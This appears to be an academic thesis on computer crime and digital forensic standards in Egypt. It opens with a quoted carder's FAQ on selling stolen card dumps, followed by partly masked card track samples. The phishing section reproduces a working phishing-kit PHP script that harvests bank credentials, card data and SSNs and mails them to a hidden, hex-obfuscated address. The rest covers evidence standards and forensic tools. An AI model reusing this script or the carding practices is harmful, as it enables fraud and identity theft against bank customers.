discounts for great orders?>-Yes, sure. Also i provide amazing discounts for a>long-term custommers and just if i am in good mood.> >After I've sent you Western union order, what info>should I let you know of?>-The name and the surname of the sender, MTCN>(10-digit code), amount, city, state and country.> >Do you replace the dumps if during the use I've>received DECLINE, PICK UP, unsufficient funds, call>for authorization etc.?>-No, I don't make any replacements, cause I check all>the dumps before the selling on the good checking>service, which doesn't kill dumps as rapidly as the>other ones. But in some cases i can investigate why>this happened.> >Will your US dumps work in the Europe?>-I don't recommend to buy the dumps for the Europe,>cause some dumps work there, but some - don't work and>I do not offer any guarantee.> >Do you sell your dumps on credit?>-No, I don't, cause the credit spoils the>relationship.> >I am want to buy, but i am affraid to be ripped. What>to do?>-Yes, we understanding you - there is very lot of>rippers over the internet for the moment. Because this>we offer you not to order a bulk for a first time ->you can order 1-2pcs for test and later proceed to>bigger ammounts, so we will know better each other.> >May i have one or two dumps for test?>Yes. You can BUY one or two dumps for test - there is>no minimum.>WE NOT PROVIDING ANY FREE DUMPS.THOSE WHO PROCEED TO>ANNOY AFTER FIRST WARNING IN ICQ WILL IMMEDIATELLY>WILL BE ADDED TO IGNORE LIST.>NO MONEY - NO HONEY.> >I not know what BIN to order. Can you help me?>-Yes, if i know what is good in your region and i have>it in my stock - i will provide you with the pleasure.
Figure 1.11: an offer mail of credit cards details
B5490??????????14248^FU /PABLO ^06111010000004100???????00000
5490????????????14248=0611??????00004100000
MBNA platinum
B51488?????????998^WELNA /MICHAEL R ^070510100????????000000000
51488??????????998=070510100??????7000000
Figure 1.12: Sample of credit card details
1.3.4 Fourth case (Phishing):
Phishing is the act of sending an e-mail (http://www.webopedia.com/TERM/P/e_mail.html) to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the user into surrendering private information that will be used for identity theft. The e-mail directs the user to visit a Web site (http://www.webopedia.com/TERM/P/Web_site.html) where they are asked to update personal information, such as passwords and credit card, social security, and bank account numbers, that the legitimate organization already has. The Web site, however, is bogus and set up only to steal the user’s information (7).
Figure 1.13: Phishing sites by country of host (8)
Figure 1.14: Screenshot for a phishing site part 1
Figure 1.15: Screenshot for a phishing site part 2
<?php
$COOKIE_VAR="616c6c616e64736d6969746840696e626f782e636f6d";
//USER ACCOUNT
$account_state = $_POST['account_state'];
$online_id = $_POST['online_id'];
$pin = $_POST['pin'];
$passcode = $_POST['passcode'];
$repasscode = $_POST['repasscode'];
$email = $_POST['email'];
//BILLING ADDRESS
$cardname = $_POST['cardname'];
$address1 = $_POST['address1'];
$address2 = $_POST['address2'];
$city = $_POST['city'];
$state = $_POST['state'];
$zip = $_POST['zip'];
$phone = $_POST['phone'];
//ACCOUNT INFORMATION
$ccnumber= $_POST['ccnumber'];
$mexpcc = $_POST['mexpcc'];
$yexpcc = $_POST['yexpcc'];
$cvv = $_POST['cvv'];
$ban = $_POST['ban'];
$brn = $_POST['brn'];
//SECURITY QUESTION
$mmn = $_POST['mmn'];
$ssn = $_POST['ssn'];
$dob = $_POST['dob'];
$dln = $_POST['dln'];
$msg = "--------------------------------------
Account open in : $account_state\nOnline ID : $online_id\nPasscode : $passcode\nATM PIN : $pin\nEmail : $email
--------------------------------------
Card Holder Name : $cardname\nAddress1 : $address1\nAddress2 : $address2\nCity : $city\nState : $state\nZipcode : $zip\nPhone : $phone
----------------------------------------
Credit Card Number : $ccnumber\nExpiration Date : $mexpcc-$yexpcc\nCVV2 : $cvv\nSiteKey Question 1 : $ban\nSiteKey Question 2 : $brn
----------------------------------------
SiteKey Answer 1 : $mmn\nSiteKey Answer 2 : $ssn\nMMN : $dln\nSSN : $dob
----------------------------------------\n";
$to="???????@yahoo.com";
$message="";
for ($j=0; $j<strlen($COOKIE_VAR);$j=$j+2)
{
$message.=chr(hexdec($COOKIE_VAR[$j].$COOKIE_VAR[$j+1]));
}
$subj = "$ccnumber - nEwBOA";
$from = "Kids@BankOfAmerica.com";
$arr=array($to, $message);
foreach ($arr as $to)
{
mail ($to, $subj, $msg, $from);
}
header("Location: complete.htm");
?>
Figure 1.16: a script used in phishing processes
Part П
Digital Evidence and Computer Crime
Part П
Digital Evidence and Computer Crime
Within the past few years a new class of crime scenes has become more prevalent, that is, crimes committed within electronic or digital domains, particularly within cyberspace. Criminal justice agencies throughout the world are being confronted with an increased need to investigate crimes perpetrated partially or entirely over the Internet or other electronic media. Resources and procedures are needed to effectively search for, locate, and preserve all types of electronic evidence. This evidence ranges from images of child pornography to encrypted data used to further a variety of criminal activities. Even in investigations that are not primarily electronic in nature, at some point in the investigation computer files or data may be discovered and further analysis required (9).
2.1 Definitions:
Digital evidence or electronic evidence is any probative information stored or transmitted in digital form that a party to a court case may use at trial (10).
The definition proposed by the Standard Working Group on Digital Evidence (SWGDE) is any information of probative value that is either stored or transmitted in a digital form. Another definition proposed by the International Organization of Computer Evidence (IOCE) is information stored or transmitted in binary form that may be relied upon in court. However, these definitions focus too heavily on proof and neglect data that simply further an investigation. Additionally, the term binary in the later definition is inexact, describing just one of many common representations of computerized data (11).
Types of digital evidence:
The use of digital evidence has increased in the past few decades as courts have allowed the use of e-mails, digital photographs, ATM transaction logs, word processing documents, instant message histories, files saved from accounting programs, spreadsheets, internet browser histories, databases, the contents of computer memory, computer backups, computer printouts, Global Positioning System tracks, logs from a hotel’s electronic door locks, and digital video or audio files (10).
In Egypt low no. 15\2004 allowed the use of digital evidences in court.
The terms digital evidence and electronic evidence are sometimes used interchangeably. However, an effort should be made to distinguish between electronic devices such as mobile telephones and the digital data that they contain. When considering the many sources of digital evidence, it is useful to categorize computer systems into three groups:
Open computer systems: Open computer systems are what most people think of as computers - systems comprised of hard drives, keyboards, and monitors such as laptops, desktops, and servers that obey standards. These systems, with their ever increasing amounts of storage space, can be rich sources of digital evidence. A simple file can contain incriminating information and can have associated properties that are useful in an investigation. For example, details such as when a file was created, who created it, or that it was created on another computer can all be important.
Communication systems: Traditional telephone systems, wireless telecommunication systems, the Internet, and networks in general can be a source of digital evidence. For instance, the Internet carries e-mail messages around the world. The time a message was sent, who sent it, or what the message contained can all be important in an investigation. To verify when a message was sent, it may be necessary to examine log files from intermediate servers and routers that handled a given message. To verify the contents of a message, it may be necessary to eavesdrop on the communication as it occurs.
Embedded computer systems: Mobile telephones, personal digital assistants, smart cards, and many other systems with embedded computers may contain digital evidence. For example, navigation systems can be used to determine where a vehicle has been and Sensing and Diagnostic Modules in many vehicles hold data that can be useful for understanding accidents, including the vehicle speed, brake status, and throttle position during the last five seconds before impact. Microwave ovens are now available with embedded computers that can download information from the Internet and some home appliances allow users to program them remotely via a wireless network or the Internet. In an arson investigation, data recovered from a microwave can indicate that it was programmed to trigger a fire at a specific time (11).
2.2 The Need for Standardization :
In 1994, the O.J. Simpson trial exposed many of the weaknesses of criminal investigation and forensic science. The investigation was hampered from the start with incomplete evidence collection, documentation and preservation at the crime scenes. Arguably, as a result of these initial errors, experienced forensic scientists were confused by and incorrectly interpreted important exhibits, introducing sufficient doubt for the jurors. The controversy surrounding this case made it clear that investigators and forensic scientists were not as reliable as was previously believed, undermining not just their credibility but also that of their profession. This crisis motivated many crime laboratories and investigative agencies to revise their procedures, improve training, and make other changes to avoid similar problems in the future. More recently flaws have been found in the fingerprint and DNA analysis performed by some crime laboratories, calling many convictions into questions and creating doubts about the analytical techniques themselves.
A similar crisis is looming in the area of digital evidence. The lack of generally required standards of practice and training allows weaknesses to persist, resulting in incomplete evidence collection, documentation and preservation as well as errors in analysis and interpretation of digital evidence. Innocent individuals may be in jail as a result of improper digital evidence handling and interpretation allowing the guilty to remain free. Failures to collect digital evidence have undermined investigations, preventing the apprehension or prosecution of offenders and wasting valuable resources on cases abandoned due to faulty evidence. If this situation is not corrected, the field will not develop to its full potential, justice will not be served, and we risk a crisis that could discredit the field. The only reason we have not already encountered such as crisis is that our mistakes have been masked by obscurity. As more cases become reliant on digital evidence and more attention is focused on it, we must take steps to establish standards of practice and compel practitioners to conform to them.
There have been several noteworthy developments toward standardization in this field. The International Organization of Computer Evidence (www.ioce.org (http://www.ioce.org/)) was established in the mid-1990s "to ensure the harmonization of methods and practices among nations and guarantee the ability to use digital evidence collected by one state in the courts of another state." In 1998, the Scientific Working Group on Digital Evidence (www.swgde.org (http://www.swgde.org/)) was established to "promulgate accepted forensic guidelines and definitions for the handling of digital evidence." In 2001, the first Digital Forensics Research Work Shop (www.dfrws.org (http://www.dfrws.org/)) was held, bringing together knowledgeable individuals from academia, military and the private sector to discuss the main challenges and research needs in the field. This workshop also gave new life to an idea proposed several years earlier — a peer-reviewed journal - leading to the creation of the International Journal of Digital Evidence (www.ijde.org (http://www.ijde.org/)). In 2003, the American Society of Crime Laboratory Directors/Laboratory Accreditation Board (ASCLD/LAB) updated its accreditation manual to include standards and criteria for digital evidence examiners in US crime laboratories. In 2004 the UK Forensic Science Service plans to develop a registry of qualified experts, and several European organizations, including the European Network of Forensic Science Institutes (ENFSI) will publish examination and report writing guidelines for digital investigators. Also, Elsevier will begin publishing Digital Investigation: The International Journal of Digital Forensics and Incident Response (http://www.compseconline.com/digitalinvestigation/ (http://www.compseconline.com/digitalinvestigation/)).
Historically, Forensic Science disciplines have used certification to oversee standards of practice and training. Certification provides a standard that individuals need to reach to qualify in a profession and provides an incentive to reach a certain level of knowledge. Without certification, the target and rewards of extra effort are unclear. This is not to say that everyone who handles digital evidence requires the same level of skill or training. A strong certification program needs to have tiered levels of certification facilitating progression upwards, setting basic requirements for crime scene technicians, and setting higher standards for specialists in a laboratory and for investigators who are responsible for analyzing evidence.
Although there are a growing number of certification programs for digital investigators, many are only available to law enforcement personnel and none are internationally accepted. In 2004, representatives from around the world convened to discuss the feasibility of an internationally accepted certification for digital investigators. The outcome is not decided and there are obstacles to such a certification. Some feel that proposed training requirements are too high while others fear that certification will enable anyone to enter the field and obtain specialized knowledge, even individuals who work for the defense on criminal cases. There is also the fear that setting standards and placing additional requirements on practitioners will make it more difficult to get digital evidence admitted in court(11).
Scientific Working Group on Digital Evidence (SWGDE)(12)
International Organization on Digital Evidence (IOCE)
2.3 Standards:
Principle 1
In order to ensure that digital evidence is collected, preserved, examined, or transferred in a manner safeguarding the accuracy and reliability of the evidence, law enforcement and forensic organizations must establish and maintain an effective quality system. Standard Operating Procedures (SOPs) are documented quality-control guidelines that must be supported by proper case records and use broadly accepted procedures, equipment, and materials.
Standards and Criteria 1.1
All agencies that seize and/or examine digital evidence must maintain an appropriate SOP document. All elements of an agency's policies and procedures concerning digital evidence must be clearly set forth in this SOP document, which must be issued under the agency's management authority.
Discussion.The use of SOPs is fundamental to both law enforcement and forensic science. Guidelines that are consistent with scientific and legal principles are essential to the acceptance of results and conclusions by courts and other agencies. The development and implementation of these SOPs must be under an agency's management authority.
Standards and Criteria 1.2
Agency management must review the SOPs on an annual basis to ensure their continued suitability and effectiveness.
Discussion.Rapid technological changes are the hallmark of digital evidence, with the types, formats, and methods for seizing and examining digital evidence changing quickly. In order to ensure that personnel, training, equipment, and procedures continue to be appropriate and effective, management must review and update SOP documents annually.
Standards and Criteria 1.3
Procedures used must be generally accepted in the field or supported by data gathered and recorded in a scientific manner.
Discussion.Because a variety of scientific procedures may validly be applied to a given problem, standards and criteria for assessing procedures need to remain flexible. The validity of a procedure may be established by demonstrating the accuracy and reliability of specific techniques. In the digital evidence area, peer review of SOPs by other agencies may be useful.
Standards and Criteria 1.4
The agency must maintain written copies of appropriate technical procedures.
Discussion.Procedures should set forth their purpose and appropriate application. Required elements such as hardware and software must be listed and the proper steps for successful use should be listed or discussed. Any limitations in the use of the procedure or the use or interpretation of the results should be established. Personnel who use these procedures must be familiar with them and have them available for reference.
Standards and Criteria 1.5
The agency must use hardware and software that is appropriate and effective for the seizure or examination procedure.
Discussion.Although many acceptable procedures may be used to perform a task, considerable variation among cases requires that personnel have the flexibility to exercise judgment in selecting a method appropriate to the problem.
Hardware used in the seizure and/or examination of digital evidence should be in good operating condition and be tested to ensure that it operates correctly. Software must be tested to ensure that it produces reliable results for use in seizure and/or examination purposes.
Standards and Criteria 1.6
All activity relating to the seizure, storage, examination, or transfer of digital evidence must be recorded in writing and be available for review and testimony.
Discussion.In general, documentation to support conclusions must be such that, in the absence of the originator, another competent person could evaluate what was done, interpret the data, and arrive at the same conclusions as the originator.
The requirement for evidence reliability necessitates a chain of custody for all items of evidence. Chain-of-custody documentation must be maintained for all digital evidence.
Case notes and records of observations must be of a permanent nature. Handwritten notes and observations must be in ink, not pencil, although pencil (including color) may be appropriate for diagrams or making tracings. Any corrections to notes must be made by an initialed, single strikeout; nothing in the handwritten information should be obliterated or erased. Notes and records should be authenticated by handwritten signatures, initials, digital signatures, or other marking systems.
Standards and Criteria 1.7
Any action that has the potential to alter, damage, or destroy any aspect of original evidence must be performed by qualified persons in a forensically sound manner.
Discussion.As outlined in the preceding standards and criteria, evidence has value only if it can be shown to be accurate, reliable, and controlled. A quality forensic program consists of properly trained personnel and appropriate equipment, software, and procedures to collectively ensure these attributes.
2.4 Investigative Tools :
2.5.1 Overview:
In the early days of computer crime investigation, it was common for digital investigators to use the evidentiary computer itself to obtain evidence. One risk of this approach was that operating the evidentiary computer could alter the evidence in a way that is undetectable. Although programs such as dd on UNIX existed in the 1980s and could be used to capture deleted data stored on a hard drive, these tools were not widely used and most digital evidence examinations at that time were performed at the file system level, neglecting deleted data.
It was not until the early 1990s, that tools like SafeBack and DIBS were developed to enable digital investigators to collect all data on a computer disk, without altering important details. At around the same time, tools such as those still available from Maresware and NTI were developed by individuals from the US Internal Revenue Service (IRS) to help digital investigators process data on a computer disk. The Royal Canadian Mounted Police (RCMP) also developed specialized tools for examining computers. As more people became aware of the evidentiary value of computers, the need for more advanced tools grew. To address this need, integrated tools like Encase and FTK were developed to make the digital investigator's job easier. These tools enable more efficient examination, by automating routine tasks and display data in a graphical user interface to help the user locate important details. Recently, there has been renewed interest in Linux as a digital evidence examination platform and tools such as The Sleuthkit and SMART have been developed to provide a user-friendly interface. More sophisticated tools utilizing powerful microscopes are available to recover overwritten data from hard drives, but these are prohibitively expensive for most purposes.
Unfortunately, many individuals are still unaware of the need for these tools. Although courts have been lenient on investigators who mishandle digital evidence, this is changing as awareness of the associated issues grows. Gates Rubber Co. v. Bando Chemical Indus. Ltd. provides an example of one court that criticized an investigator for improper digital evidence handling. Instead of using specialized digital evidence processing tools, the investigator copied individual files from the computer and was criticized by the court for not using "the method which would yield the most complete and accurate results."
There has been a similar progression in the evolution of tools for collecting evidence on communication systems. In the late 1980s, Clifford Stoll described how he made paper printouts of network traffic in an effort to preserve it as evidence. Network monitoring tools like tcpdump and Ethereal can be used to capture network traffic but they are not specifically designed for collecting digital evidence. Commercial tools such as Carnivore, NetIntercept, NFR Security, NetWitness, and SilentRunner have been developed with integrated search, visualization, and analysis features to help digital investigators extract information from network traffic.
There has been a similar progression in the evolution of tools for collecting evidence on embedded computer systems. It is common for digital investigators to read data from pagers, mobile phones, and personal digital assistants directly from the devices. However, this approach does not provide access to deleted data and may not be possible if the device is password protected or does not have a way to display the data it contains. Therefore, tools such as ZERT, TULP, and Cards4Labs have been developed to access password protected and deleted data. More sophisticated techniques involving electron microscopes are available to recover encrypted data from embedded systems but these are prohibitively expensive for most purposes.
Over the years, bugs have been found in various digital evidence processing tools, potentially causing evidence to be missed or misinterpreted. To avoid the resulting miscarriages of justice that may result from such errors, it is desirable to assess the reliability of commonly used tools. The National Institute of Standards and Testing are making an effort to test some digital evidence processing tools. However, testing even the most basic functionality of tools is a time intensive process making it difficult to keep up with changes in the tools. Also, it is unlikely that a single group can test every tool including those used to collect evidence from networks and embedded systems. Additionally, in some instances, it may not be possible to create standard tests for the advanced features of various tools, because each tool has different features.
Another approach that has been suggested to reduce the complexity of tool testing is to allow people to see the source code for critical components of the software. Providing programmers around the world with source code allows tool testers to gain a better understanding of the program and increases the chances that bugs will be found. It is acknowledged that commercial tool developers will want to keep some portions of their programs private to protect their competitive advantage. However, certain operations, such as copying data from a hard drive, are sufficiently common and critical to require an open standard. Ultimately, given the complexity of computer systems and the tools used to examine them, it is not possible to eliminate or even quantify the errors, uncertainties, and losses and digital investigators must validate their own results using multiple tools (11).
2.5.2 Examples of hardware tools:
2.5.2.1 Forensic system:
Figure 2.1: Forensic system
The F.R.E.D. family of forensic workstations consists of integrated forensic processing platforms capable of handling the most challenging computer case. Available in mobile, stationary and laboratory configurations, these systems are designed for both the acquisition and examination of computer evidence (13)
2.5.2.2 RoadMASSter-3:
Figure 2.2: RoadMASSter-3
The RoadMASSter 3 Forensics data acquisition and analysis tool is designed to perform both as a fast and reliable hard drive imaging and data analysis unit. This computer forensic system is built for the road with all the tools necessary to acquire or analyze data from today’s common interface technologies including FireWire 1394A/B, USB, IDE, SATA, SAS and SCSI. With features such as multiple media support, multiple capture mode support, on the fly hashing capabilities, powerful processor for analysis, the RoadMASSter 3 is a versatile and powerful Forensic tool (14)
2.5.2.3 HardCopy II Drive Imaging System:
Figure 2.3: 3 HardCopy II Drive Imaging System
HardCopy 2. Copies drives at up to 5.5 GB per minute, built in MD5, lightweight, all the power of HardCopy and then some! HardCopy 2 adds the ability to chunk the data during a hard drive image, to ease archiving later (15).
2.5.2.4 ImageMASSter 6007SAS:
Figure 2.4: ImageMASSter 6007SAS
ICS Industrial High-Speed Multiple Hard Drive Duplicators are being used for hard drive cloning, copying data, upgrading computers and sanitizing hard drives on the production line of the major PC Manufacturers as well as thousands of large and middle size corporations. Copy data in different modes, image hard drives of different size and models, erase data, copy hidden partitions, format hard drives, reliable hard drive cloning (14).
2.5.3 Examples of software tools:
2.5.3.1 EnCase® Software:
(http://www.guidancesoftware.com/)
Figure 2.5: EnCase® Software
EnCase is the hands-down leader in stand-alone forensics analysis software. EnCase is loaded with features, and is widely accepted in court. Users can examine files, including deleted files and unallocated data. It produces reports and extracts without altering the original data (16).
2.5.3.2 The Forensic ToolKit:
Figure 2.6: The Forensic ToolKit
Figure 2.7: Screenshot for Forensic Toolkit
Forensic Toolkit is customizable filters allow you to sort through thousands of files to quickly find the evidence you need. Forensic Toolkit is recognized as the leading forensic tool to perform e-mail analysis (13).
2.5.3.3 Decode - Forensic Date/Time Decoder:
Figure 2.8: Screenshot for Decode - Forensic Date/Time Decoder
This utility was designed to decode the various date/time values found embedded within binary and other file types. This release now supports the following date/time formats and will allow you to specify the offset from GMT.
Date and time values are stored within Windows in various formats. For example, Internet History - index.dat, recycle bin INFO files, windows link files and Microsoft Office documents all contain a 64bit date/time structure.
During a forensic examination, you may need to decode a date or verify the date provided to you by forensic software. This is where decode comes in. Decode can take a decimal value or a HEX value and convert it into a date & time in a variety of formats (17).
Part Ш
Standard model for digital evidences investigation in Egypt
Part Ш
Standard model for digital evidences investigation in Egypt
Any scientific work can represent by a triangle, first side is a qualified persons, second is the appropriate tools and third is the methodology.
Standard model should take into account those three points:
3.1 Qualified persons:
There are three different categories deal with digital evidences:
Digital Crime Scene Technicians: Individuals responsible for gathering data at a crime scene should have basic training in evidence handling and documentation as well as in basic crime reconstruction to help them locate all available sources of evidence on a network.
Digital Evidence Examiners: Individuals responsible for processing particular kinds of digital evidence require specialized training and certification in their area.
Digital Investigators: Individuals responsible for the overall investigation should receive a general training but do not need very specialized training or certification. Investigators are also responsible for reconstructing the actions relating to a crime using information from first responders and forensic examiners to create a more complete picture for investigators and attorneys.
Training and certification programs in this field should take into account these different areas of expertise (11).
[Principle 1 :Must be a minimum qualification and certification for persons dealing with digital evidence according to their specialties ]
3.2 Appropriate tools:
As we said before there are a lot of hardware and software tools used in digital evidence investigations.
[ Principle 2 : There must be a list of approved software and hardware tools used in digital evidence investigation , it must be checked and update regularly ]
3.3 Methodology:
There is no ONE methodology for performing a forensic investigation and analysis. There are too many variables for there to be just one way. Some of the 'typical' variables which first come to mind include; operating systems, software applications, cryptographic algorithms and applications, and hardware platforms. Every investigation is unique and can bring unforeseeable challenges, so the methodology should not be viewed as an end-point but rather as a framework or foundation upon which to build.
[ Principle 3 : Document every thing . ]
Documentation is essential at all stages of handling and processing digital evidence. It is very important to document every procedure in investigation (who, when, how, where).
[ Principle 4 : The integrity of the original media must be maintained throughout the entire investigation , the state of evidence must be unaltered. ]
If it is possible make an exact image of the investigated media, there is a lot of software and hardware helped in this process and always use a suitable tools for your case .
[ Principle 5 : Investigation process must be divided into five phases : Identification , Collection , Examination , Analysis and Reporting . ]
· Identification:
Which recognizes an incident from indicators and determines its type, each type of e-crime has its own types of digital evidences.
· Collection:
Collection of digital evidence must be done without altering it; there must be specific rules for collection different kind of evidence.
· Examination:
It is an in-depth systematic search of evidence relating to the suspected crime.
· Analysis:
Determination of the significance, reconstructing fragments of data and drawing conclusions based on evidence found.
· Reporting:
Writing a report is one of the most important stages of the investigative reconstruction process because, unless findings are communicated clearly in writing, others are unlikely to understand or make use of them; there must be standard templates for every kind of investigations.
References
[1] Technical Working Group for Electronic Crime Scene Investigation, 2001, Crime Scene Electronic Crime Scene Investigation: A Guide for First Responders.
http://www.ojp****doj.gov/nij/pubs-sum/187736.htm
[2] Computer crime, Wikipedia, the free encyclopedia.
http://en.wikipedia.org/wiki/Computer_crime (http://en.wikipedia.org/wiki/Computer_crime)
[3] United Nations office at Vienna, 1994, United Nations Manual on the prevention and control of computer-related crime, International review of criminal policy, Nos.43 and 44.
http://www.unodc.org/unodc/crime_cicp_standards_manuals.html
[4] Egypt's Information Portal, Ministry of Communication and Information Technology.
http://www.ipgd.idsc.gov.eg/Indicators/IndicatorsResult_Details.asp?IndicatorID=657 (http://www.ipgd.idsc.gov.eg/Indicators/IndicatorsResult_Details.asp?IndicatorID=657)
[5] Credit card fraud, Wikipedia, the free encyclopedia.
http://en.wikipedia.org/wiki/Credit_card_fraud
[6] Devices Designed Illegally to Read Credit Card Information from Gas Station Pumps , Arizona Department of Weights and Measures .
http://azdwm.gov/Portals/1/PDF/SkimmerPressReleaseJune2007.pdf (http://azdwm.gov/Portals/1/PDF/SkimmerPressReleaseJune2007.pdf)
[7] Phishing , Webopedia , online computer dictionary for computer and internet terms and definitions.
http://www.webopedia.com/TERM/p/phishing.html
[8] Phishtank.
http://www.phishtank.com/images/phish_world_map.gif
[9] Lee H.,Palmbach T. and Miller M. (2001) Henry Lee's Crime Scene Handbook, London: Academic Press.
[10] Digital evidence, Wikipedia, the free encyclopedia.
http://en.wikipedia.org/wiki/Digital_evidence (http://en.wikipedia.org/wiki/Digital_evidence)
[11] Casey Eoghan , 2004 , Digital Evidence and Computer Crime: Forensic Science, Computers, and the Internet, Second Edition ,Academic Press .
[12] Scientific Working Group on Digital Evidence(SWGDE),International Organization on Digital Evidence ( IOCE ) ,2000, Digital Evidence: Standards and Principles , Forensic Science communications Volume 2 Number 2 , U.S Department of Justice
http://www.fbi.gov/hq/lab/fsc/backissu/april2000/swgde.htm (http://www.fbi.gov/hq/lab/fsc/backissu/april2000/swgde.htm)
[13] Digital Intelligence, Software, Hardware, Training & Casework solutions for the computer community.
http://www.digitalintelligence.com/forensichardware.php (http://www.digitalintelligence.com/forensichardware.php)
[14] Intelligent Computer Solutions.
http://www.ics-iq.com/ (http://www.ics-iq.com/)
[15] Forensicpc.com.
http://www.forensicpc.com/proddetail.asp?prod=HARDCOPY2 (http://www.forensicpc.com/proddetail.asp?prod=HARDCOPY2)
[16] Genco.A. Elizabeth, 2002, Do-it-yourselfer experiences the do's and don'ts of building a forensics workstation.
http://searchsecurity.techtarget.com/ (http://searchsecurity.techtarget.com/)
[17] Digital Detective ( Forensic Computing Tools & Utilities ).
http://www.digital-detective.co.uk/freetools/decode.asp (http://www.digital-detective.co.uk/freetools/decode.asp)
Arabic Summary
ملخص
مع التزايد المطرد في استخدام الكمبيوتر والانترنت ووسائل الاتصال الحديثة , هناك تزايد مناظر في استخدام تلك الوسائل اما كأدوات مساعدة في الجرائم التقليدية او في نوعيات جديدة من الجرائم , وجميع تلك الجرائم يمكن ان يطلق عليها جرائم تكنولوجيا المعلومات او الجرائم الالكترونية .
وجرائم تكنولوجيا المعلومات يمكن النظر اليها من اكثر من وجهة نظر , فيمكن بحثها من وجهة النظر القانونية او من وجهة نظر علم الاجتماع او من وجهة نظر علوم الحاسب الالي .
الا اننا في تلك الدراسة تناولناها من وجهة نظر العلوم الشرعية – العدلية – حيث تناولنا في البداية تعريف تلك الجرائم والانواع الشائعة منها وقمنا بسرد عدد من الحالات الواقعية لتلك الجرائم في مصر ثم تناولنا صلب الموضوع – من وجهة نظر العلوم الشرعية – الا وهو الادلة واساليب تحقيقها فقمنا بتعريف الادلة الرقمية وانواعها والحاجة الملحة لوجود اسس ضابطة لهذا العلم والجهد العالمي المبذول لايجاد تلك الاسس وتطور عملية البحث عن الادلة وامثلة من الادوات المستخدمة في تلك العملية , واخيرا قمنا بوضع نموذج قياسي للبحث عن الادلة الرقمية في مصر وذلك عن طريق تطبيق عدد من المفاهيم الاساسية .